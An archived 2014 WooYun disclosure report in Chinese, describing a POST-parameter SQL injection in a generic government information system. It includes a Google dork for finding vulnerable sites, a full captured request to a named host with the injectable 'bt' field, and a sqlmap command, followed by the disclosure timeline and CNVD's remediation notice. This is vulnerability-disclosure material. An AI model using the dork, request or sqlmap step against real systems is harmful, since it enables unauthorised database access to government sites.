乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-20: 细节已通知厂商并且等待厂商处理中 2014-05-25: 厂商已经确认,细节仅向厂商公开 2014-05-28: 细节向第三方安全合作伙伴开放 2014-07-19: 细节向核心白帽子及相关领域专家公开 2014-07-29: 细节向普通白帽子公开 2014-08-08: 细节向实习白帽子公开 2014-08-18: 细节向公众公开
某通用政府信息系统存在SQL注入漏洞
google:inurl:/web_news/DownClassList.aspx 表单中变量存在POST注入。抓包并保存为txt:
POST /web_news/DownClassList.aspx?news_bigclass=8&ProType=17&ViewID=197 HTTP/1.1Host: www.xszbjyw.com:82Proxy-Connection: keep-aliveContent-Length: 2609Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.xszbjyw.com:82User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.xszbjyw.com:82/web_news/DownClassList.aspx?news_bigclass=8&ProType=17&ViewID=197Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4Cookie: ASP.NET_SessionId=torghg45nznv4cvyxj503eq5__VIEWSTATE=%2FwEPDwUKMTc0Nzg3ODI2Nw9kFgICAw9kFgQCAQ8PFgIeBFRleHQFM%2BmmlumhtSA%2BIOe9keS4iuacjeWKoSA%2BIOi1hOaWmeS4i%2Bi9vSA%2BIOaUv%2BW6nOmHh%2Bi0rWRkAgcPPCsADQEADxYOHgpEQkNvbm5OYW1lBQRNYWluHgtfIURhdGFCb3VuZGceC1JlY29yZENvdW50AgweCkRhdGFNZW1iZXIFBnRhYmxlMR4LXyFJdGVtQ291bnQCDB4KUGFnZXNDb3VudAICHgZTcWxTdHIFoQIgc2VsZWN0IE5ld3NfYmlnY2xhc3MsTmV3c19pZCxuZXdzX2VudGVydGltZSxOZXdzX3RpdGxlLHpseHp1cmwgIGZyb20gd2ViX25ld3MgIHdoZXJlIG5ld3NfYmlnY2xhc3M9OCBhbmQgTmV3c19sb2NhbD0n5pys57qnJyBhbmQgbmV3c19seD0xNyBhbmQgUHVibGlzaFN0YXJ0VGltZTw9Z2V0ZGF0ZSgpICBhbmQgKG5ld3NfZW5kdGltZSBpcyBudWxsIG9yIG5ld3NfZW5kdGltZT49Z2V0ZGF0ZSgpKSBhbmQgc2ZmYj0n5pivJyBhbmQgSVNkZWxldGU9MCAgb3JkZXIgYnkgUHVibGlzaFN0YXJ0VGltZSBkZXNjZBYCZg9kFhpmDw8WAh4HVmlzaWJsZWhkZAIBD2QWBGYPZBYCZg8VAhkxNDA1MDcxMTE4MDQ5MjkyMzAyMDguZG9jJ%2BWIhuaVo%2B%2B8iOiHquihjOaLm%2Bagh%2B%2B8iemHh%2Bi0reWkh%2BahiOihqGQCAQ8PFgIfAAUKMjAxNC0wNS0wN2RkAgIPZBYEZg9kFgJmDxUCGTE0MDUwNzExMTgyODM4MDQzMDcyMC5kb2Mt5YiG5pWj77yI6Ieq6KGM5oub5qCH77yJ6YeH6LSt6LSn54mp6aqM5pS25Y2VZAIBDw8WAh8ABQoyMDE0LTA1LTA3ZGQCAw9kFgRmD2QWAmYPFQIZMTQwMzI4MDE1MjExNjA2NTE5OTY4LmRvYyflhbPkuo7ovaznvZHkuIrnq57ku7fkv53or4Hph5HnmoTmiqXlkYpkAgEPDxYCHwAFCjIwMTQtMDMtMjhkZAIED2QWBGYPZBYCZg8VAhkxNDAzMjEwOTEwMDc5MTkxMjc2NDguZG9jG%2BaUv%2BW6nOmHh%2Bi0reWnlOaJmOWNj%2BiuruS5pmQCAQ8PFgIfAAUKMjAxNC0wMy0yMWRkAgUPZBYEZg9kFgJmDxUCGTE0MDMyMDAzMzAwODQyMTQyODY3Mi5kb2Mk6YeH6LSt5Y2V5L2N5oql5a6h6Z2e5a6a54K56aWt5bqX55SoZAIBDw8WAh8ABQoyMDE0LTAzLTIwZGQCBg9kFgRmD2QWAmYPFQIbMTQwMTIyMDEyNjM4NzIyODI2MjY1NjAuZG9jGTIwMTTlubTlip7lhazlrrblhbfmmI7nu4ZkAgEPDxYCHwAFCjIwMTQtMDEtMjJkZAIHD2QWBGYPZBYCZg8VAhkxMzEwMTQxMjQwMzY3MTEyNDIxOTcucmFyHuaUv%2BW6nOmbhuS4remHh%2Bi0reacjeWKoeaJi%2BWGjGQCAQ8PFgIfAAUKMjAxMy0xMC0xNGRkAggPZBYEZg9kFgJmDxUCGjEzMDkwNTAyMDQxODkxODIzNDUwODguZG9jOOiQp%2BaLm%2BeuoeWKnu%2B8iDIwMTPvvIkz5Y%2B377yI5a6a54K56aWt5bqX5pyA57uI5paH5Lu277yJZAIBDw8WAh8ABQoyMDEzLTA5LTA1ZGQCCQ9kFgRmD2QWAmYPFQIaMTMwODE0MDMwNTUzMjI3MzIwMTIxNi5kb2MfMjAxM%2BW5tOaVmeiCsuezu%2Be7n%2BiuvuWkh%2Ba4heWNlWQCAQ8PFgIfAAUKMjAxMy0wOC0xNGRkAgoPZBYEZg9kFgJmDxUCGTEzMDczMTAyNDQwMjE2MzUyMDk5Mi5kb2Me5pS%2F5bqc6YeH6LSt6YCA5L%2Bd6K%2BB6YeR6K%2BB5piOZAIBDw8WAh8ABQoyMDEzLTA3LTMxZGQCCw8PFgIfCGhkZAIMD2QWAmYPZBYCAgwPD2QWAh4JT25LZXlEb3duBXRqYXZhc2NyaXB0OiBpZiAoZXZlbnQua2V5Q29kZT09MTMpIHtkb2N1bWVudC5hbGwuR3JpZFZpZXdlcjFfY3RsMTNfQnRuR290by5mb2N1cygpOyBldmVudC5rZXlDb2RlPTEzOyByZXR1cm4gdHJ1ZTsgfWQYAQULR3JpZFZpZXdlcjEPPCsACgEIAgJkw6Hwjf2oxubEztB4ZN5OXtpYjHM%3D&__EVENTVALIDATION=%2FwEWCQKa1qKeDgK%2B79rvDALq5Ji9BgL1lKqEDQLWoLboCQLiucnTDgLO3qSVBwL6%2FJG6DALbwuKQCrW4OTEFOheKfVh8U%2B1dffyqCavV&bt=%25%27&btnSeach=%E6%9F%A5%E8%AF%A2&GridViewer1%24ctl13%24NumGoto=1
sqlmap.py -r data.txt
过滤
危害等级:高
漏洞Rank:12
确认时间:2014-05-25 14:34
CNVD确认并复现所述情况,转由CNCERT下发浙江分中心,联系受影响政府部门和软件生产厂商处置。
暂无